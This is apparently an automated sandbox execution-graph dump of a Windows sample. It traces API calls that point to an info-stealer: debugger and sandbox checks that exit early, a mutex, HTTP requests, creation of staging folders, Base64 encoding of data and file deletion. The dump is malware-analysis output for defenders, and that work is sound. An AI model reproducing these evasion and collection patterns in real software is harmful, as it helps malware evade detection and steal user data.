35820->35823 35822 40c689 77 API calls 35821->35822 35824 40a54b ctype 35822->35824 35823->35824 35825 40a606 35824->35825 35826 40a5e9 35824->35826 35875 40410f 77 API calls numpunct 35825->35875 35827 40c689 77 API calls 35826->35827 35829 40a5f9 ctype 35827->35829 35830 40a673 DeleteUrlCacheEntry 35829->35830 35831 40a689 35830->35831 35832 40a68f DeleteUrlCacheEntry InternetOpenA 35830->35832 35831->35832 35834 40a6b0 35832->35834 35833 40a753 35876 40381a 35833->35876 35834->35833 35835 40a6dc InternetConnectA 35834->35835 35837 40a7a4 InternetCloseHandle 35835->35837 35838 40a6f8 HttpOpenRequestA 35835->35838 35837->35833 35840 40a725 HttpSendRequestA HttpQueryInfoA 35838->35840 35841 40a79b InternetCloseHandle 35838->35841 35840->35833 35842 40a75a 35840->35842 35841->35837 35863 41f2f3 35842->35863 35845 40a773 InternetReadFile 35846 40a794 InternetCloseHandle 35845->35846 35846->35841 35847 40a7ca ctype 35880 41deb4 35847->35880 35849 40a836 35851 409f94 35850->35851 35852 40a0bd 35851->35852 35853 403a16 numpunct 77 API calls 35851->35853 35852->35795 35853->35852 35855 40d6c5 __EH_prolog3_catch 35854->35855 35888 40d4da 35855->35888 35857 40d6d5 35858 40d706 std::locale::_Init 35857->35858 35892 40d70e 77 API calls 3 library calls 35857->35892 35858->35802 35955 403c13 35860->35955 35862 40c6ae 35862->35814 35864 41f2dd 35863->35864 35969 428d44 35864->35969 35868 403a24 numpunct 35867->35868 35869 403a45 35868->35869 35870 403a28 35868->35870 35871 403cac numpunct 77 API calls 35869->35871 35872 403c13 numpunct 77 API calls 35870->35872 35873 403a43 _memmove 35871->35873 35872->35873 35873->35800 35874->35807 35875->35829 35877 403824 35876->35877 35877->35877 35878 403a16 numpunct 77 API calls 35877->35878 35879 403839 35878->35879 35879->35847 35881 41debc 35880->35881 35882 41debe IsDebuggerPresent 35880->35882 35881->35849 36000 42f2c5 35882->36000 35885 4240a9 SetUnhandledExceptionFilter UnhandledExceptionFilter 35886 4240c6 __call_reportfault 35885->35886 35887 4240ce GetCurrentProcess TerminateProcess 35885->35887 35886->35887 35887->35849 35889 40d4e5 35888->35889 35891 40d4f2 35888->35891 35889->35891 35893 403cac 35889->35893 35891->35857 35892->35857 35894 403cb6 35893->35894 35896 403cc0 35893->35896 35903 41d3b9 67 API calls 2 library calls 35894->35903 35898 403cd0 ctype 35896->35898 35899 403f24 35896->35899 35898->35891 35900 403f30 __EH_prolog3_catch 35899->35900 35904 40406b 35900->35904 35902 403f7b std::locale::_Init ctype _memmove 35902->35898 35903->35896 35905 4040b0 35904->35905 35906 404078 35904->35906 35905->35902 35907 404086 35906->35907 35912 41eb16 35906->35912 35907->35905 35924 41e15e 66 API calls std::exception::_Copy_str 35907->35924 35910 40409b 35925 421126 RaiseException 35910->35925 35914 41eb20 35912->35914 35915 41eb3a 35914->35915 35920 41eb3c std::exception::exception 35914->35920 35926 41e042 35914->35926 35943 42482a DecodePointer 35914->35943 35915->35907 35917 41eb7a 35945 41e1e3 66 API calls std::exception::operator= 35917->35945 35919 41eb84 35946 421126 RaiseException 35919->35946 35920->35917 35944 41dfe6 76 API calls __cinit 35920->35944 35923 41eb95 35924->35910 35925->35905 35927 41e0bf 35926->35927 35939 41e050 35926->35939 35953 42482a DecodePointer 35927->35953 35929 41e0c5 35954 423e5b 66 API calls __getptd_noexit 35929->35954 35932 41e07e RtlAllocateHeap 35933 41e0b7 35932->35933 35932->35939 35933->35914 35935 41e0ab 35951 423e5b 66 API calls __getptd_noexit 35935->35951 35939->35932 35939->35935 35940 41e0a9 35939->35940 35941 41e05b 35939->35941 35950 42482a DecodePointer 35939->35950 35952 423e5b 66 API calls __getptd_noexit 35940->35952 35941->35939 35947 4247e2 66 API calls __NMSG_WRITE 35941->35947 35948 424633 66 API calls 6 library calls 35941->35948 35949 424140 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 35941->35949 35943->35914 35944->35917 35945->35919 35946->35923 35947->35941 35948->35941 35950->35939 35951->35940 35952->35933 35953->35929 35954->35933 35956 403c32 35955->35956 35957 403c28 35955->35957 35959 403c42 35956->35959 35960 403c5c 35956->35960 35966 41d406 67 API calls 2 library calls 35957->35966 35967 403eae 67 API calls 2 library calls 35959->35967 35961 403cac numpunct 77 API calls 35960->35961 35965 403c5a _memmove 35961->35965 35963 403c4e 35968 403eae 67 API calls 2 library calls 35963->35968 35965->35862 35966->35956 35967->35963 35968->35965 35970 428d5d 35969->35970 35973 428b19 35970->35973 35985 41eb96 35973->35985 35975 428b3d 35993 423e5b 66 API calls __getptd_noexit 35975->35993 35978 428b42 35994 424edb 11 API calls __wcsnicoll_l 35978->35994 35981 428b73 35983 428bba 35981->35983 35995 42eeec 79 API calls 3 library calls 35981->35995 35982 40a766 35982->35833 35982->35845 35982->35846 35983->35982 35996 423e5b 66 API calls __getptd_noexit 35983->35996 35986 41eba9 35985->35986 35992 41ebf6 35985->35992 35997 427b66 66 API calls 2 library calls 35986->35997 35988 41ebae 35989 41ebd6 35988->35989 35998 42793d 74 API calls 6 library calls 35988->35998 35989->35992 35999 4271bc 68 API calls 6 library calls 35989->35999 35992->35975 35992->35981 35993->35978 35994->35982 35995->35981 35996->35982 35997->35988 35998->35989 35999->35992 36000->35885 36001 4279b6 RtlEncodePointer 36002 c6fbe0 36003 c6fca4 LoadLibraryW 36002->36003 36006 c6fc00 36002->36006 36016 c6fd21 36003->36016 36004 c6fc4c 36034 c6fe70 76 API calls std::_String_base::_Xlen 36004->36034 36005 c6fd6f 36041 c71705 5 API calls __invoke_watson 36005->36041 36006->36004 36010 c6fc31 InterlockedExchange 36006->36010 36033 c71bed 68 API calls 6 library calls 36010->36033 36011 c6fd7b 36012 c6fc54 36035 c6ff20 76 API calls 36012->36035 36016->36005 36026 c6ea60 36016->36026 36038 c71714 104 API calls _setvbuf 36016->36038 36039 c71c7b 68 API calls 2 library calls 36016->36039 36040 c71b57 82 API calls 4 library calls 36016->36040 36018 c6fc68 36019 c6fc88 GetProcessAffinityMask GetCurrentHwProfileW 36018->36019 36020 c71d0a _malloc 68 API calls 36018->36020 36037 c6fee0 task 36019->36037 36023 c6fc7b 36020->36023 36036 c71799 70 API calls 5 library calls 36023->36036 36025 c6fc85 36025->36019 36028 c6ea6b 36026->36028 36027 c6ea77 ContinueDebugEvent GetSystemDirectoryW VirtualAlloc ActivateKeyboardLayout AcquireSRWLockShared 36027->36028 36028->36027 36029 c6eac0 36028->36029 36030 c6eadd GetModuleHandleW 36028->36030 36029->36030 36042 c6c050 36030->36042 36033->36006 36034->36012 36035->36018 36036->36025 36037->36003 36038->36016 36039->36016 36040->36016 36041->36011 36043 c6c086 36042->36043 36044 c6c0d4 36042->36044 36049 c639b0 102 API calls __vswprintf_c_l 36043->36049 36046 c6c0fe GetProcAddress 36044->36046 36047 c6cb95 36046->36047 36048 c6c0c5 lstrcpyW 36048->36046 36049->36048 36050 c672d1 LocalAlloc 36051 c674d6 36050->36051 36052 c73fef HeapCreate 36053 c74013 36052->36053 36054 c78e8b 36057 c78e94 36054->36057 36056 c78ed1 36057->36056 36058 c78eb2 Sleep 36057->36058 36060 c75a6f 36057->36060 36059 c78ec7 36058->36059 36059->36056 36059->36057 36061 c75a7b type_info::_Type_info_dtor 36060->36061 36062 c75a93 36061->36062 36072 c75ab2 _memset 36061->36072 36073 c73df7 68 API calls __getptd_noexit 36062->36073 36064 c75a98 36074 c7202d 6 API calls 2 library calls 36064->36074 36066 c75b24 RtlAllocateHeap 36066->36072 36069 c75aa8 type_info::_Type_info_dtor 36069->36057 36072->36066 36072->36069 36075 c73fbc 68 API calls 2 library calls 36072->36075 36076 c74ae2 5 API calls 2 library calls 36072->36076 36077 c75b6b LeaveCriticalSection _doexit 36072->36077 36078 c760b8 6 API calls __decode_pointer 36072->36078 36073->36064 36075->36072 36076->36072 36077->36072 36078->36072 36079 420faf 36119 424400 36079->36119 36081 420fbb GetStartupInfoW 36082 420fda 36081->36082 36083 420fcf HeapSetInformation 36081->36083 36120 4245ef HeapCreate 36082->36120 36083->36082 36085 421033 36121 427caf GetModuleHandleW 36085->36121 36086 421028 36086->36085 36240 420f86 66 API calls 3 library calls 36086->36240 36089 421039 36090 421044 __RTC_Initialize 36089->36090 36241 420f86 66 API calls 3 library calls 36089->36241 36146 426a99 GetStartupInfoW 36090->36146 36094 42105e GetCommandLineA 36159 42b7d1 GetEnvironmentStringsW 36094->36159 36101 421083 36183 42b4a0 36101->36183 36104 421089 36105 421094 36104->36105 36244 4243e2 66 API calls 3 library calls 36104->36244 36203 4241c1 36105->36203 36108 42109c 36109 4210a7 36108->36109 36245 4243e2 66 API calls 3 library calls 36108->36245 36209 42b441 36109->36209 36115 4210d7 36247 4243c4 66 API calls _doexit 36115->36247 36118 4210dc ___FrameUnwindToState 36119->36081 36120->36086 36122 427cc3 36121->36122 36123 427ccc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 36121->36123 36248 4279fc 70 API calls _free 36122->36248 36124 427d16 TlsAlloc 36123->36124 36128 427d64 TlsSetValue 36124->36128 36129 427e25 36124->36129 36127 427cc8 36127->36089 36128->36129 36130 427d75 36128->36130 36129->36089 36249 42416a RtlEncodePointer EncodePointer __init_pointers __initp_misc_winsig FindHandlerForForeignException 36130->36249 36132 427d7a EncodePointer EncodePointer EncodePointer EncodePointer 36250 428efe InitializeCriticalSectionAndSpinCount 36132->36250 36134 427db9 36135 427e20 36134->36135 36136 427dbd DecodePointer 36134->36136 36258 4279fc 70 API calls _free 36135->36258 36138 427dd2 36136->36138 36138->36135 36251 42303f 36138->36251 36141 427df0 DecodePointer 36142 427e01 36141->36142 36142->36135 36143 427e05 36142->36143 36257 427a39 66 API calls 4 library calls 36143->36257 36145 427e0d GetCurrentThreadId 36145->36129 36147 42303f __calloc_crt 66 API calls 36146->36147 36148 426ab7 36147->36148 36151 42303f __calloc_crt 66 API calls 36148->36151 36152 421052 36148->36152 36154 426bac 36148->36154 36155 426c2c 36148->36155 36149 426c62 GetStdHandle 36149->36155 36150 426cc6 SetHandleCount 36150->36152 36151->36148 36152->36094 36242 4243e2 66 API calls 3 library calls 36152->36242 36153 426c74 GetFileType 36153->36155 36154->36155 36156 426be3 InitializeCriticalSectionAndSpinCount 36154->36156 36157 426bd8 GetFileType 36154->36157 36155->36149 36155->36150 36155->36153 36158 426c9a InitializeCriticalSectionAndSpinCount 36155->36158 36156->36152 36156->36154 36157->36154 36157->36156 36158->36152 36158->36155 36161 42b7ed 36159->36161 36164 42106e 36159->36164 36160 42b802 WideCharToMultiByte 36162 42b822 36160->36162 36163 42b85a FreeEnvironmentStringsW 36160->36163 36161->36160 36161->36161 36270 422ffa 36162->36270 36163->36164 36172 42b716 36164->36172 36167 42b830 WideCharToMultiByte 36168 42b842 36167->36168 36169 42b84e FreeEnvironmentStringsW 36167->36169 36276 41e008 66 API calls 2 library calls 36168->36276 36169->36164 36171 42b84a 36171->36169 36173 42b730 GetModuleFileNameA 36172->36173 36174 42b72b 36172->36174 36176 42b757 36173->36176 36283 42765f 94 API calls __setmbcp 36174->36283 36277 42b57c 36176->36277 36178 421078 36178->36101 36243 4243e2 66 API calls 3 library calls 36178->36243 36180 422ffa __malloc_crt 66 API calls 36181 42b799 36180->36181 36181->36178 36182 42b57c _parse_cmdline 76 API calls 36181->36182 36182->36178 36184 42b4a9 36183->36184 36186 42b4ae _strlen 36183->36186 36285 42765f 94 API calls __setmbcp 36184->36285 36187 42303f __calloc_crt 66 API calls 36186->36187 36190 42b4bc 36186->36190 36193 42b4e3 _strlen 36187->36193 36188 42b532 36287 41e008 66 API calls 2 library calls 36188->36287 36190->36104 36191 42303f __calloc_crt 66 API calls 36191->36193 36192 42b558 36288 41e008 66 API calls 2 library calls 36192->36288 36193->36188 36193->36190 36193->36191 36193->36192 36196 42b56f 36193->36196 36286 41e985 66 API calls __wcsnicoll_l 36193->36286 36289 424e89 10 API calls __call_reportfault 36196->36289 36199 42b57b 36201 42b608 36199->36201 36290 431f2f 76 API calls x_ismbbtype_l 36199->36290 36200 42b706 36200->36104 36201->36200 36202 431f2f 76 API calls _parse_cmdline 36201->36202 36202->36201 36204 4241cf __IsNonwritableInCurrentImage 36203->36204 36291 42f2dc 36204->36291 36206 4241ed __initterm_e 36208 42420e __IsNonwritableInCurrentImage 36206->36208 36294 41dfe6 76 API calls __cinit 36206->36294 36208->36108 36210 42b454 36209->36210 36211 42b44f 36209->36211 36213 4210ad 36210->36213 36296 431f2f 76 API calls x_ismbbtype_l 36210->36296 36295 42765f 94 API calls __setmbcp 36211->36295 36215 40c3fe LoadLibraryA 36213->36215 36216 40c441 6 API calls 36215->36216 36217 40c421 GetProcAddress GetProcAddress 36215->36217 36297 40c372 36216->36297 36217->36216 36220 40c372 80 API calls 36221 40c4e9 Sleep Sleep 36220->36221 36222 40c580 36221->36222 36223 40c52e Sleep Sleep GetSystemTime Sleep Sleep 36221->36223 36225 40c372 80 API calls 36222->36225 36532 41f58a 66 API calls __getptd 36223->36532 36227 40c585 Sleep Sleep GetCurrentProcess VirtualAllocExNuma 36225->36227 36226 40c55e Sleep Sleep 36533 41f59c 66 API calls __getptd 36226->36533 36229 40c5b4 ExitProcess 36227->36229 36230 40c5bb 36227->36230 36306 401102 VirtualAlloc 36230->36306 36231 40c572 Sleep Sleep 36231->36222 36238 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 36239 40c602 36238->36239 36239->36115 36246 424398 66 API calls _doexit 36239->36246 36240->36085 36241->36090 36246->36115 36247->36118 36248->36127 36249->36132 36250->36134 36254 423048 36251->36254 36253 423085 36253->36135 36253->36141 36254->36253 36255 423066 Sleep 36254->36255 36259 427eaa 36254->36259 36256 42307b 36255->36256 36256->36253 36256->36254 36257->36145 36258->36129 36260 427eb6 36259->36260 36266 427ed1 36259->36266 36261 427ec2 36260->36261 36260->36266 36268 423e5b 66 API calls __getptd_noexit 36261->36268 36263 427ee4 RtlAllocateHeap 36265 427f0b 36263->36265 36263->36266 36264 427ec7 36264->36254 36265->36254 36266->36263 36266->36265 36269 42482a DecodePointer 36266->36269 36268->36264 36269->36266 36272 423003 36270->36272 36271 41e042 _malloc 65 API calls 36271->36272 36272->36271 36273 423039 36272->36273 36274 42301a Sleep 36272->36274 36273->36163 36273->36167 36275 42302f 36274->36275 36275->36272 36275->36273 36276->36171 36279 42b59b 36277->36279 36281 42b608 36279->36281 36284 431f2f 76 API calls x_ismbbtype_l 36279->36284 36280 42b706 36280->36178 36280->36180 36281->36280 36282 431f2f 76 API calls _parse_cmdline 36281->36282 36282->36281 36283->36173 36284->36279 36285->36186 36286->36193 36287->36190 36288->36190 36289->36199 36290->36199 36292 42f2e2 EncodePointer 36291->36292 36292->36292 36293 42f2fc 36292->36293 36293->36206 36294->36208 36295->36210 36296->36210 36534 415a2e 36297->36534 36299 40c3f0 36302 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 36299->36302 36300 40c38c ctype 36300->36299 36542 415bb2 GetUserNameA 36300->36542 36303 40c3fc 16 API calls 36302->36303 36303->36220 36304 40c3be ctype 36304->36299 36305 40c3e8 ExitProcess 36304->36305 36308 401122 _memset 36306->36308 36307 401156 Sleep Sleep 36310 40104c 36307->36310 36308->36307 36309 40113f VirtualFree 36308->36309 36309->36307 36549 401000 GetPEB 36310->36549 36313 4010f9 ExitProcess 36314 401000 2 API calls 36315 401069 36314->36315 36315->36313 36316 401000 2 API calls 36315->36316 36317 40107c 36316->36317 36317->36313 36318 401000 2 API calls 36317->36318 36319 40108b 36318->36319 36319->36313 36320 401000 2 API calls 36319->36320 36321 40109a 36320->36321 36321->36313 36322 401000 2 API calls 36321->36322 36323 4010a9 36322->36323 36323->36313 36324 401000 2 API calls 36323->36324 36325 4010b8 36324->36325 36325->36313 36326 401000 2 API calls 36325->36326 36327 4010c7 36326->36327 36327->36313 36328 401000 2 API calls 36327->36328 36329 4010d6 36328->36329 36329->36313 36330 401000 2 API calls 36329->36330 36331 4010e5 36330->36331 36331->36313 36332 401000 2 API calls 36331->36332 36333 4010f4 36332->36333 36333->36313 36334 401101 Sleep Sleep Sleep Sleep 36333->36334 36335 40b5ad 36334->36335 36553 40115a 36335->36553 36342 415bb2 78 API calls 36343 40b657 36342->36343 37205 41551f 36343->37205 36347 40b685 36348 40d431 77 API calls 36347->36348 36349 40b69f ctype 36348->36349 36350 40b6f7 CreateMutexA GetLastError 36349->36350 36351 40b711 Sleep 36350->36351 36364 40b71c 36350->36364 36351->36364 36353 407e11 77 API calls 36353->36364 36354 40a83e 103 API calls 36354->36364 36355 40b76a StrCmpCA 36355->36364 36356 40b7a1 StrCmpCA 36358 40b855 36356->36358 36356->36364 37229 41d251 86 API calls 2 library calls 36358->37229 36362 40b862 37230 417368 94 API calls 6 library calls 36362->37230 36364->36353 36364->36354 36364->36355 36364->36356 36365 40b7fe StrCmpCA 36364->36365 36368 40b835 StrCmpCA 36364->36368 36370 40b81d 36364->36370 37223 407dcb 77 API calls numpunct 36364->37223 37224 40410f 77 API calls numpunct 36364->37224 37225 40a958 102 API calls 3 library calls 36364->37225 37226 407dee 77 API calls numpunct 36364->37226 37227 40410f 77 API calls numpunct 36364->37227 36365->36364 36366 40b876 ctype 37231 40d47c 77 API calls 2 library calls 36366->37231 36368->36358 36371 40b845 Sleep 36368->36371 36370->36364 36370->36368 37228 40a958 102 API calls 3 library calls 36370->37228 36371->36364 36373 40b8b4 ctype 36374 40b8f1 CreateDirectoryA 36373->36374 36375 40b907 36374->36375 36376 40b90c SetCurrentDirectoryA 36374->36376 36375->36376 37232 40d337 77 API calls 2 library calls 36376->37232 36378 40b92a CreateDirectoryA 36380 40b94b ctype 36378->36380 37233 407d85 77 API calls numpunct 36380->37233 36382 40b957 37234 40d3fa 77 API calls 36382->37234 36384 40b973 37235 40ed7d 19 API calls 3 library calls 36384->37235 36386 40b9a0 37236 40c606 77 API calls numpunct 36386->37236 36388 40b9af 37237 407feb 83 API calls 5 library calls 36388->37237 36390 40b9b4 ctype 36391 40381a numpunct 77 API calls 36390->36391 36392 40ba02 36391->36392 37238 40d47c 77 API calls 2 library calls 36392->37238 36394 40ba21 37239 40d3c3 77 API calls 36394->37239 36396 40ba38 37240 417319 68 API calls 2 library calls 36396->37240 36398 40ba4d 37241 40d3c3 77 API calls 36398->37241 36400 40ba5c 37242 40d3c3 77 API calls 36400->37242 36402 40ba7a 37243 40ef26 13 API calls __ehhandler$___std_fs_change_permissions@12 36402->37243 36404 40ba94 ctype 37244 407b7e 82 API calls 2 library calls 36404->37244 36406 40bae7 37245 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36406->37245 36408 40bafc 37246 40d337 77 API calls 2 library calls 36408->37246 36410 40bb20 37247 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36410->37247 36412 40bb3f ctype 37248 40d337 77 API calls 2 library calls 36412->37248 36414 40bb6f 37249 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36414->37249 36416 40bb8e ctype 37250 40d337 77 API calls 2 library calls 36416->37250 36418 40bbbe 37251 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36418->37251 36420 40bbdd ctype 37252 40d337 77 API calls 2 library calls 36420->37252 36422 40bc0d 37253 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36422->37253 36424 40bc2c ctype 37254 40d337 77 API calls 2 library calls 36424->37254 36426 40bc5c 37255 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36426->37255 36428 40bc7b ctype 37256 40d337 77 API calls 2 library calls 36428->37256 36430 40bcab 37257 40aa08 92 API calls __ehhandler$___std_fs_change_permissions@12 36430->37257 36432 40bcca ctype 37258 40d337 77 API calls 2 library calls 36432->37258 36434 40bcf9 CreateDirectoryA 36436 40bd1c ctype 36434->36436 37259 40d337 77 API calls 2 library calls 36436->37259 36438 40bd2f CreateDirectoryA 36440 40bd4c ctype 36438->36440 37260 40d337 77 API calls 2 library calls 36440->37260 36442 40bd5f CreateDirectoryA 36444 40bd7c ctype 36442->36444 37261 40d337 77 API calls 2 library calls 36444->37261 36446 40bd8f CreateDirectoryA 36448 40bdac ctype 36446->36448 37262 40d337 77 API calls 2 library calls 36448->37262 36450 40bdbf CreateDirectoryA 36452 40bddc ctype 36450->36452 37263 40d337 77 API calls 2 library calls 36452->37263 36454 40bdef CreateDirectoryA 36456 40be0c ctype 36454->36456 37264 40d337 77 API calls 2 library calls 36456->37264 36458 40be1f SetCurrentDirectoryA 36460 40be3f ctype 36458->36460 37265 40410f 77 API calls numpunct 36460->37265 36462 40be4e 36463 403c13 numpunct 77 API calls 36462->36463 36464 40bec5 ctype 36463->36464 37266 413f3c 497 API calls 5 library calls 36464->37266 36466 40beeb 37267 40410f 77 API calls numpunct 36466->37267 36468 40bef8 SetCurrentDirectoryA 36470 40bf16 ctype 36468->36470 37268 4036f6 193 API calls 36470->37268 36472 40bf1b 37269 40abd6 251 API calls 4 library calls 36472->37269 36474 40bf24 36475 40bfb6 36474->36475 37270 40d337 77 API calls 2 library calls 36474->37270 37273 40d337 77 API calls 2 library calls 36475->37273 36478 40bf49 CreateDirectoryA 36483 40bf6a ctype 36478->36483 36479 40bfc9 SetCurrentDirectoryA 36482 40bfe9 ctype 36479->36482 36485 40c047 ctype 36482->36485 37274 40d337 77 API calls 2 library calls 36482->37274 37271 40d337 77 API calls 2 library calls 36483->37271 36488 40c06e SetCurrentDirectoryA 36485->36488 37278 417d56 82 API calls 36485->37278 36486 40bf7d SetCurrentDirectoryA 36494 40bf9d ctype 36486->36494 36493 40381a numpunct 77 API calls 36488->36493 36492 40c00a 37275 40dbba 115 API calls 4 library calls 36492->37275 36496 40c0aa 36493->36496 37272 409d7b 196 API calls 4 library calls 36494->37272 37279 40d337 77 API calls 2 library calls 36496->37279 36497 40c018 37276 40d337 77 API calls 2 library calls 36497->37276 36500 40c0c4 37280 4175c4 79 API calls ctype 36500->37280 36501 40c02a 37277 408fb7 132 API calls 5 library calls 36501->37277 36504 40c0db 37281 408117 140 API calls 4 library calls 36504->37281 36507 40c132 36509 40c1f0 CreateThread 36507->36509 36510 40c199 CryptBinaryToStringA 36507->36510 36508 40c102 ctype 36508->36507 37282 41d1a8 78 API calls codecvt 36508->37282 36511 40c221 36509->36511 36512 40c275 CloseHandle 36509->36512 37498 40aab2 181 API calls 3 library calls 36509->37498 36510->36509 36514 40c1b4 GetProcessHeap HeapAlloc 36510->36514 36522 40c24e CreateThread 36511->36522 36526 40c25e Sleep 36511->36526 36515 40c287 36512->36515 36516 40c29a 36512->36516 36514->36509 36519 40c1ce 36514->36519 36515->36516 36518 40c291 36515->36518 37284 41d357 81 API calls codecvt 36516->37284 37283 407c94 67 API calls 2 library calls 36518->37283 36519->36519 36520 40c1de CryptBinaryToStringA 36519->36520 36520->36509 36521 40c29f SetCurrentDirectoryA 36524 40c2b8 36521->36524 36525 40c2bd SHFileOperation 36521->36525 36522->36526 37497 40aab2 181 API calls 3 library calls 36522->37497 36524->36525 37285 4179da 87 API calls 4 library calls 36525->37285 36526->36511 36526->36512 36527 40c297 36527->36521 36529 40c2fc ctype 36530 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 36529->36530 36531 40c357 36530->36531 36531->36238 36532->36226 36533->36231 36547 430d40 36534->36547 36537 415a7a 36538 40381a numpunct 77 API calls 36537->36538 36539 415a8a 36538->36539 36540 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 36539->36540 36541 415a9a 36540->36541 36541->36300 36543 40381a numpunct 77 API calls 36542->36543 36544 415bff 36543->36544 36545 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 36544->36545 36546 415c0e 36545->36546 36546->36304 36548 415a40 GetComputerNameA 36547->36548 36548->36537 36550 40103c 36549->36550 36551 401042 36550->36551 36552 40102c lstrcmpiW 36550->36552 36551->36313 36551->36314 36552->36550 36552->36551 37286 402bd4 LocalAlloc 36553->37286 36556 402bd4 LocalAlloc 36557 401186 36556->36557 36558 402bd4 LocalAlloc 36557->36558 36559 40119e 36558->36559 36560 402bd4 LocalAlloc 36559->36560 36561 4011b6 36560->36561 36562 402bd4 LocalAlloc 36561->36562 36563 4011cc 36562->36563 36564 402bd4 LocalAlloc 36563->36564 36565 4011e1 36564->36565 36566 402bd4 LocalAlloc 36565->36566 36567 4011f7 36566->36567 36568 402bd4 LocalAlloc 36567->36568 36569 40120d 36568->36569 36570 402bd4 LocalAlloc 36569->36570 36571 401223 36570->36571 36572 402bd4 LocalAlloc 36571->36572 36573 401239 36572->36573 36574 402bd4 LocalAlloc 36573->36574 36575 40124f 36574->36575 36576 402bd4 LocalAlloc 36575->36576 36577 401265 36576->36577 36578 402bd4 LocalAlloc 36577->36578 36579 40127b 36578->36579 36580 402bd4 LocalAlloc 36579->36580 36581 401293 36580->36581 36582 402bd4 LocalAlloc 36581->36582 36583 4012a9 36582->36583 36584 402bd4 LocalAlloc 36583->36584 36585 4012bf 36584->36585 36586 402bd4 LocalAlloc 36585->36586 36587 4012d5 36586->36587 36588 402bd4 LocalAlloc 36587->36588 36589 4012ea 36588->36589 36590 402bd4 LocalAlloc 36589->36590 36591 4012ff 36590->36591 36592 402bd4 LocalAlloc 36591->36592 36593 401314 36592->36593 36594 402bd4 LocalAlloc 36593->36594 36595 40132a 36594->36595 36596 402bd4 LocalAlloc 36595->36596 36597 401340 36596->36597 36598 402bd4 LocalAlloc 36597->36598 36599 401355 36598->36599 36600 402bd4 LocalAlloc 36599->36600 36601 40136b 36600->36601 36602 402bd4 LocalAlloc 36601->36602 36603 401380 36602->36603 36604 402bd4 LocalAlloc 36603->36604 36605 401396 36604->36605 36606 402bd4 LocalAlloc 36605->36606 36607 4013ac 36606->36607 36608 402bd4 LocalAlloc 36607->36608 36609 4013c2 36608->36609 36610 402bd4 LocalAlloc 36609->36610 36611 4013d8 36610->36611 36612 402bd4 LocalAlloc 36611->36612 36613 4013ee 36612->36613 36614 402bd4 LocalAlloc 36613->36614 36615 401404 36614->36615 36616 402bd4 LocalAlloc 36615->36616 36617 401419 36616->36617 36618 402bd4 LocalAlloc 36617->36618 36619 40142f 36618->36619 36620 402bd4 LocalAlloc 36619->36620 36621 401445 36620->36621 36622 402bd4 LocalAlloc 36621->36622 36623 40145b 36622->36623 36624 402bd4 LocalAlloc 36623->36624 36625 401471 36624->36625 36626 402bd4 LocalAlloc 36625->36626 36627 401486 36626->36627 36628 402bd4 LocalAlloc 36627->36628 36629 40149b 36628->36629 36630 402bd4 LocalAlloc 36629->36630 36631 4014b1 36630->36631 36632 402bd4 LocalAlloc 36631->36632 36633 4014c6 36632->36633 36634 402bd4 LocalAlloc 36633->36634 36635 4014dc 36634->36635 36636 402bd4 LocalAlloc 36635->36636 36637 4014f2 36636->36637 36638 402bd4 LocalAlloc 36637->36638 36639 401508 36638->36639 36640 402bd4 LocalAlloc 36639->36640 36641 40151e 36640->36641 36642 402bd4 LocalAlloc 36641->36642 36643 401534 36642->36643 36644 402bd4 LocalAlloc 36643->36644 36645 40154a 36644->36645 36646 402bd4 LocalAlloc 36645->36646 36647 401560 36646->36647 36648 402bd4 LocalAlloc 36647->36648 36649 401576 36648->36649 36650 402bd4 LocalAlloc 36649->36650 36651 40158c 36650->36651 36652 402bd4 LocalAlloc 36651->36652 36653 4015a2 36652->36653 36654 402bd4 LocalAlloc 36653->36654 36655 4015b8 36654->36655 36656 402bd4 LocalAlloc 36655->36656 36657 4015ce 36656->36657 36658 402bd4 LocalAlloc 36657->36658 36659 4015e4 36658->36659 36660 402bd4 LocalAlloc 36659->36660 36661 4015f9 36660->36661 36662 402bd4 LocalAlloc 36661->36662 36663 40160f 36662->36663 36664 402bd4 LocalAlloc 36663->36664 36665 401625 36664->36665 36666 402bd4 LocalAlloc 36665->36666 36667 40163b 36666->36667 36668 402bd4 LocalAlloc 36667->36668 36669 401651 36668->36669 36670 402bd4 LocalAlloc 36669->36670 36671 40166a 36670->36671 36672 402bd4 LocalAlloc 36671->36672 36673 401680 36672->36673 36674 402bd4 LocalAlloc 36673->36674 36675 401696 36674->36675 36676 402bd4 LocalAlloc 36675->36676 36677 4016ab 36676->36677 36678 402bd4 LocalAlloc 36677->36678 36679 4016c1 36678->36679 36680 402bd4 LocalAlloc 36679->36680 36681 4016d6 36680->36681 36682 402bd4 LocalAlloc 36681->36682 36683 4016ec 36682->36683 36684 402bd4 LocalAlloc 36683->36684 36685 401702 36684->36685 36686 402bd4 LocalAlloc 36685->36686 36687 401718 36686->36687 36688 402bd4 LocalAlloc 36687->36688 36689 40172e 36688->36689 36690 402bd4 LocalAlloc 36689->36690 36691 401743 36690->36691 36692 402bd4 LocalAlloc 36691->36692 36693 401759 36692->36693 36694 402bd4 LocalAlloc 36693->36694 36695 40176f 36694->36695 36696 402bd4 LocalAlloc 36695->36696 36697 401785 36696->36697 36698 402bd4 LocalAlloc 36697->36698 36699 40179b 36698->36699 36700 402bd4 LocalAlloc 36699->36700 36701 4017b0 36700->36701 36702 402bd4 LocalAlloc 36701->36702 36703 4017c6 36702->36703 36704 402bd4 LocalAlloc 36703->36704 36705 4017db 36704->36705 36706 402bd4 LocalAlloc 36705->36706 36707 4017f1 36706->36707 36708 402bd4 LocalAlloc 36707->36708 36709 401807 36708->36709 36710 402bd4 LocalAlloc 36709->36710 36711 40181d 36710->36711 36712 402bd4 LocalAlloc 36711->36712 36713 401833 36712->36713 36714 402bd4 LocalAlloc 36713->36714 36715 401848 36714->36715 36716 402bd4 LocalAlloc 36715->36716 36717 40185e 36716->36717 36718 402bd4 LocalAlloc 36717->36718 36719 401874 36718->36719 36720 402bd4 LocalAlloc 36719->36720 36721 401889 36720->36721 36722 